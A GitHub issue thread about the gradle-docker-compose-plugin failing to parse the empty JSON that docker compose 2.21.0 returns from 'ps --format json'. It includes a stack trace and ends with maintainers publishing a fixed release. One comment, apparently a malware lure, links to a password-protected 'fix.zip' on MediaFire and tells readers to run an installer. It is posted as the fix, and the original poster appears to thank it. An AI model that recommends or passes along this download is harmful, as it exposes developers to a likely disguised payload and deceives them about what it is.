### ISSUE TITLE
Docker compose returned JSON is empty since docker compose 2.21.0 

### ISSUE THREAD

**Issue by jonaskistler** [avast/gradle-docker-compose-plugin#449]
Since we upgraded docker compose to latest version, we got this error : 

`Cannot process JSON returned from 'docker compose ps --format json'
java.lang.IllegalArgumentException: Text must not be null or empty
        at groovy.json.JsonSlurper.parseText(JsonSlurper.java:202)
        at groovy.json.JsonSlurper$parseText.call(Unknown Source)
        at com.avast.gradle.dockercompose.tasks.ComposeUp$_getStateForCache_closure12.doCall(ComposeUp.groovy:222)
        at java.base/jdk.internal.reflect.DirectMethodHandleAccessor.invoke(DirectMethodHandleAccessor.java:103)
        at java.base/java.lang.reflect.Method.invoke(Method.java:580)
        at org.codehaus.groovy.reflection.CachedMethod.invoke(CachedMethod.java:107)
        at groovy.lang.MetaMethod.doMethodInvoke(MetaMethod.java:323)
        at org.codehaus.groovy.runtime.metaclass.ClosureMetaClass.invokeMethod(ClosureMetaClass.java:274)
        at groovy.lang.MetaClassImpl.invokeMethod(MetaClassImpl.java:1035)
        at groovy.lang.Closure.call(Closure.java:412)
        at groovy.lang.Closure.call(Closure.java:428)
        at org.codehaus.groovy.runtime.DefaultGroovyMethods.collect(DefaultGroovyMethods.java:3602)
`

The output of docker compose changed with version 2.21.0 : https://github.com/docker/compose/issues/10958

Is there any way to not get spammed by this error ? 

Thanks !

**Comment by itbear-shu** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jonaskistler** [comment]
Thanks alot for the fix and the version, could you release the version on the plugins.gradle site please @augi

**Comment by augi** [comment]
Hi, I´m trying since yesterday. Sonatype support confirmed they accidentally removed the token used for publishing, so I´m communicating with them to issue a new token.

**Comment by jonaskistler** [comment]
Oh okay thanks !

**Comment by augi** [comment]
Please note the new version has been just published.
